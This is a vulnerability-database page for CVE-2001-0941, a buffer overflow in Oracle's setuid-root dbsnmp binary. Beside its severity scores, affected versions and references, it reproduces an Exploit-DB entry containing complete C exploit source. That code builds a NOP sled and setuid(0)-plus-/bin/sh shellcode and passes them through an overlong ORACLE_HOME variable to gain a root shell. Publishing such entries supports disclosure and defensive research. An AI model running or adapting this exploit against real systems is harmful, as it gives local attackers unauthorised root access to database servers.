CVE-2001-0941 : Detail

CVE-2001-0941

0.27%V3
Local
2002-02-02
04h00 +00:00
2017-07-10
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Buffer overflow in dbsnmp in Oracle 8.0.6 through 9.0.1 allows local users to execute arbitrary code via a long ORACLE_HOME environment variable.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.6 AV:L/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 21044

Publication date : 2001-08-01 22h00 +00:00
Author : Juan Manuel Pascual Escribá
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/3138/info Oracle is an Enterprise level SQL database, supporting numerous features and options. It is distributed and maintained by Oracle Corporation. When the ORACLE_HOME environment variable is filled with 750 bytes or more, a buffer overflow occurs. This overflow may be used to overwrite variables on the stack, including the return address. Since the dbsnmp program is setuid root, it is possible to gain elevated privileges, including administrative access. To exploit this vulnerability, the user must be in the oracle group. /* Exploit code for dbsnmp binary in Oracle 8.1.6.0.0 Linux Platform. I tested it in RH 6.2. dbsnmp makes setresuid(,getuid(),) before reading ORACLE_HOME environment variable. Its necessary to call setuid(0) before normal shellcode. In My tests Offset may vary from 7846 to 7896. Its posible to obtain a normal (uid=oracle) shell for low offsets (incomplete setuid(0) jumps). "Cae fuego en lugar de mana Se disfraza el asfalto de mar El zapato no encuentra el pedal Parece que anda suelto satanas." L.E.Aute This vulnerability was researched by: Juan Manuel Pascual <[email protected]> Special thanks to: Ivan Sanchez <[email protected]> Mundo Alonso-Cuevillas <[email protected]> */ #include <stdio.h> #include <stdlib.h> #define BUFFER 800 #define OFFSET 7896 #define NOP 0x90 #define BINARY "/usr/local/oracle/app/oracle/product/8.1.6/bin/dbsnmp" char shellcode[] = "\x90" /* Additional NOP */ "\x31\xc0" /* begin setuid (0) */ "\x31\xdb" "\xb0\x17" "\xcd\x80" "\xeb\x1f" "\x5e" "\x89\x76\x08" "\x31\xc0" "\x88\x46\x07" "\x89\x46\x0c" "\xb0\x0b" "\x89\xf3" "\x8d\x4e\x08" "\x8d\x56\x0c" "\xcd\x80" "\x31\xdb" "\x89\xd8" "\x40" "\xcd\x80" "\xe8\xdc\xff\xff\xff" "/bin/sh"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char *argv[]) { char *buff, *ptr,binary[120]; long *addr_ptr, addr; int bsize=BUFFER; int i,offset=OFFSET; if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = get_sp() -offset; ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; memset(buff,bsize/2,NOP); ptr = buff + ((bsize/2) - (strlen(shellcode)/2)); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; setenv("ORACLE_HOME",buff,1); system(BINARY); }

Products Mentioned

Configuraton 0

Oracle>>Database_server >> Version 8.0.6

Oracle>>Database_server >> Version 8.1.6

Oracle>>Database_server >> Version 8.1.7

Oracle>>Database_server >> Version 9.0.1

References

http://www.securityfocus.com/bid/3138
Tags : vdb-entry, x_refsource_BID
http://marc.info/?l=bugtraq&m=100716693806967&w=2
Tags : mailing-list, x_refsource_BUGTRAQ